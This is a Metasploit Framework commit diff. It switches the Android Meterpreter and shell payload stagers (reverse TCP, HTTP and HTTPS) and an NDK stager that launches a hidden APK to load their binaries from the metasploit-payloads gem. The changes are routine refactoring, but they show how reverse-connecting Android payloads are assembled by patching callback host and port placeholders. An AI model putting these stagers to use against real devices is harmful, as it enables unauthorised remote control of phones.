remove android meterpreter bins, update to payloads 1.0.2

This switches us to using the Android payload files from the
metasploit-payloads gem

.gitignore

@@ -69,7 +69,10 @@ external/source/exploits/**/Release
 # the metasploit-payloads gem.
 data/meterpreter/*.dll
 data/meterpreter/*.bin
+data/meterpreter/*.jar
 data/meterpreter/*.lso
+data/android
+data/java
 
 # Avoid checking in Meterpreter libs that are built from
 # private source. If you're interested in this functionality,

Gemfile.lock

@@ -9,7 +9,7 @@ PATH
       json
       metasploit-concern (~> 1.0)
       metasploit-model (~> 1.0)
-      metasploit-payloads (= 1.0.1)
+      metasploit-payloads (= 1.0.2)
       msgpack
       nokogiri
       packetfu (= 1.1.9)
@@ -123,7 +123,7 @@ GEM
       activemodel (>= 4.0.9, < 4.1.0)
       activesupport (>= 4.0.9, < 4.1.0)
       railties (>= 4.0.9, < 4.1.0)
-    metasploit-payloads (1.0.1)
+    metasploit-payloads (1.0.2)
     metasploit_data_models (1.1.0)
       activerecord (>= 4.0.9, < 4.1.0)
       activesupport (>= 4.0.9, < 4.1.0)

lib/msf/core/exploit/android.rb

@@ -87,8 +87,7 @@ module Exploit::Android
 
   # The NDK stager is used to launch a hidden APK
   def ndkstager(stagename, arch)
-    path = ['data', 'android', 'libs', NDK_FILES[arch] || arch, 'libndkstager.so']
-    data = File.read(File.join(Msf::Config::InstallRoot, *path), :mode => 'rb')
+    data = MetasploitPayloads.read('android', 'libs', NDK_FILES[arch] || arch, 'libndkstager.so')
     data.gsub!('PLOAD', stagename)
   end
 

metasploit-framework.gemspec

@@ -64,7 +64,7 @@ Gem::Specification.new do |spec|
   # are needed when there's no database
   spec.add_runtime_dependency 'metasploit-model', '~> 1.0'
   # Needed for Meterpreter on Windows, soon others.
-  spec.add_runtime_dependency 'metasploit-payloads', '1.0.1'
+  spec.add_runtime_dependency 'metasploit-payloads', '1.0.2'
   # Needed by msfgui and other rpc components
   spec.add_runtime_dependency 'msgpack'
   # Needed by anemone crawler

modules/payloads/stagers/android/reverse_http.rb

@@ -41,7 +41,7 @@ module Metasploit3
     lurl << "/"
     lurl << generate_uri_uuid_mode(:init_java, uri_req_len)
 
-    classes = File.read(File.join(Msf::Config::InstallRoot, 'data', 'android', 'apk', 'classes.dex'), {:mode => 'rb'})
+    classes = MetasploitPayloads.read('android', 'apk', 'classes.dex')
     string_sub(classes, 'ZZZZ' + ' ' * 512, lurl)
     apply_options(classes)
 
@@ -51,7 +51,7 @@ module Metasploit3
       [ "AndroidManifest.xml" ],
       [ "resources.arsc" ]
     ]
-    jar.add_files(files, File.join(Msf::Config.install_root, "data", "android", "apk"))
+    jar.add_files(files, MetasploitPayloads.path("android", "apk"))
     jar.build_manifest
 
     cert, key = generate_cert

modules/payloads/stagers/android/reverse_https.rb

@@ -41,7 +41,7 @@ module Metasploit3
     lurl << "/"
     lurl << generate_uri_uuid_mode(:init_java, uri_req_len)
 
-    classes = File.read(File.join(Msf::Config::InstallRoot, 'data', 'android', 'apk', 'classes.dex'), {:mode => 'rb'})
+    classes = MetasploitPayloads.read('android', 'apk', 'classes.dex')
     string_sub(classes, 'ZZZZ' + ' ' * 512, lurl)
 
     verify_cert_hash = get_ssl_cert_hash(datastore['StagerVerifySSLCert'],
@@ -59,7 +59,7 @@ module Metasploit3
       [ "AndroidManifest.xml" ],
       [ "resources.arsc" ]
     ]
-    jar.add_files(files, File.join(Msf::Config.install_root, "data", "android", "apk"))
+    jar.add_files(files, MetasploitPayloads.path("android", "apk"))
     jar.build_manifest
 
     cert, key = generate_cert

modules/payloads/stagers/android/reverse_tcp.rb

@@ -31,7 +31,7 @@ module Metasploit3
   def generate_jar(opts={})
     jar = Rex::Zip::Jar.new
 
-    classes = File.read(File.join(Msf::Config::InstallRoot, 'data', 'android', 'apk', 'classes.dex'), {:mode => 'rb'})
+    classes = MetasploitPayloads.read('android', 'apk', 'classes.dex')
 
     string_sub(classes, 'XXXX127.0.0.1                       ', "XXXX" + datastore['LHOST'].to_s) if datastore['LHOST']
     string_sub(classes, 'YYYY4444                            ', "YYYY" + datastore['LPORT'].to_s) if datastore['LPORT']
@@ -44,7 +44,7 @@ module Metasploit3
       [ "resources.arsc" ]
     ]
 
-    jar.add_files(files, File.join(Msf::Config.data_directory, "android", "apk"))
+    jar.add_files(files, MetasploitPayloads.path("android", "apk"))
     jar.build_manifest
 
     cert, key = generate_cert

modules/payloads/stages/android/meterpreter.rb

@@ -39,11 +39,8 @@ module Metasploit3
   def generate_stage(opts={})
     # TODO: wire the UUID into the stage
     clazz = 'androidpayload.stage.Meterpreter'
-    file = File.join(Msf::Config.data_directory, "android", "metstage.jar")
-    metstage = File.open(file, "rb") {|f| f.read(f.stat.size) }
-
-    file = File.join(Msf::Config.data_directory, "android", "meterpreter.jar")
-    met = File.open(file, "rb") {|f| f.read(f.stat.size) }
+    metstage = MetasploitPayloads.read("android", "metstage.jar")
+    met = MetasploitPayloads.read("android", "meterpreter.jar")
 
     # Name of the class to load from the stage, the actual jar to load
     # it from, and then finally the meterpreter stage

modules/payloads/stages/android/shell.rb

@@ -36,8 +36,7 @@ module Metasploit3
   #
   def generate_stage(opts={})
     clazz = 'androidpayload.stage.Shell'
-    file = File.join(Msf::Config.data_directory, "android", "shell.jar")
-    shell_jar = File.open(file, "rb") {|f| f.read(f.stat.size) }
+    shell_jar = MetasploitPayloads.read("android", "shell.jar")
 
     # Name of the class to load from the stage, and then the actual jar
     # to load it from